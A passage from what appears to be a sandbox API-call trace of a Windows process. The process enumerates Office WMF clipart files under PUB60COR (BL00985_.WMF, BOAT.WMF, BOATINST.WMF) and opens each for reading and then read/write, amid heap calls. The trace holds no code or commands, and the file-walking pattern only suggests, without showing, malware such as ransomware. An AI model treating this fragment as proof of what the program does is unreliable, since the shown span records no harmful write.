ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c14)) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0102.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.976] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeb8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00985_.WMF", cAlternateFileName="")) returned 1 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0102.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.977] AreFileApisANSI () returned 1 [0102.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0102.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.977] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.978] AreFileApisANSI () returned 1 [0102.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0102.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 69 [0102.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.978] GetFileType (hFile=0x33c) returned 0x1 [0102.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0102.978] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.978] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.978] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.979] CloseHandle (hObject=0x33c) returned 1 [0103.087] AreFileApisANSI () returned 1 [0103.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0103.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 69 [0103.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.088] GetFileType (hFile=0x368) returned 0x1 [0103.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0103.088] CloseHandle (hObject=0x368) returned 1 [0103.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.090] AreFileApisANSI () returned 1 [0103.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0103.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF") returned 69 [0103.090] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00985_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xeb8)) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0103.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.090] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd16, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BOAT.WMF", cAlternateFileName="")) returned 1 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0103.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0103.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0103.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.091] AreFileApisANSI () returned 1 [0103.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF", lpUsedDefaultChar=0x0) returned 65 [0103.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0103.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.091] AreFileApisANSI () returned 1 [0103.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0103.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82cb8 [0103.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82cb8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 65 [0103.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.092] GetFileType (hFile=0x368) returned 0x1 [0103.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82cb8 | out: hHeap=0x20000) returned 1 [0103.092] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.092] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.093] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.093] CloseHandle (hObject=0x368) returned 1 [0103.093] AreFileApisANSI () returned 1 [0103.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0103.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82568 [0103.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 65 [0103.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.093] GetFileType (hFile=0x368) returned 0x1 [0103.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0103.093] CloseHandle (hObject=0x368) returned 1 [0103.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.094] AreFileApisANSI () returned 1 [0103.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0103.094] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6d2045, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd16)) returned 1 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6abd89, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6abd89, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x714c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BOATINST.WMF", cAlternateFileName="")) returned 1 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.094] AreFileApisANSI () returned 1 [0103.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft 